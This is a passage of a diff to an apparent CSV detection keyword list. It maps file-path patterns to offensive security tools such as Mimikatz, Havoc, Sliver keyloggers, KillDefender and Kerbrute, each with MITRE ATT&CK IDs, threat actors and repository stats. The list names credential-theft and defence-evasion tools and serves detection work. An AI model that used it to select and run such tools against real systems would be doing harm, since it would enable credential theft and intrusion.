- T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "*/KDStab/*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" -"*/keepass_discover_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/keepass_discover.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/keepass_discover_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/keepass_trigger.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/KeeThief.git*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10","","N/A","","","" -"*/kerberoast.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/kerberoast.c*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/kerberoast.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/kerberoast.c*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/kerberoast.c*","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","234","28","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" -"*/kerberoast.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/kerberoast.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/kerberoast/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/kerberoast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*/kerberos.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/kerberoast.h*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/kerberoast.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/kerberoast/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/kerberoast_hashes_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/kerberos.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*/kerberos-ldap-password-hunter*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","10","2","189","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*/kerberosticket.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*/kerbrute/*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"*/kerbrute/*","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "*/KernelMii.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tijme/kernel-mii","1","1","N/A","10","10","72","27","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z" -"*/keylogger.cpp*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","126","37","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"*/keylogger.cpp*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" "*/KeyLogger.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" -"*/keylogger.exe*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","126","37","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" -"*/keylogger/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/keylogger.exe*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"*/keylogger/*.*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/keyscan.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*/killav.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/killav.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/killav.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/killav.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/KillDefenderBOF*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" "*/kimi.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*/kismet*","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","0","N/A","N/A","10","1297","272","2023-09-29T14:28:16Z","2016-09-20T13:26:00Z" -"*/kismetwireless/*","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","1","N/A","N/A","10","1297","272","2023-09-29T14:28:16Z","2016-09-20T13:26:00Z" -"*/kitrap0d.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/kittens/haloKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/kittens/recycleKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/KittyStager/*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*/kiwi.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/kiwi_passwords.yar*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/kismet*","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","0","N/A","N/A","10","1299","272","2023-09-29T14:28:16Z","2016-09-20T13:26:00Z" +"*/kismetwireless/*","offensive_tool_keyword","kismet","Kismet is a wireless network and device detector. sniffer. wardriving tool. and WIDS (wireless intrusion detection) framework.","T1016 - T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/kismetwireless/kismet","1","1","N/A","N/A","10","1299","272","2023-09-29T14:28:16Z","2016-09-20T13:26:00Z" +"*/kitrap0d.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/kittens/haloKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/kittens/recycleKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any 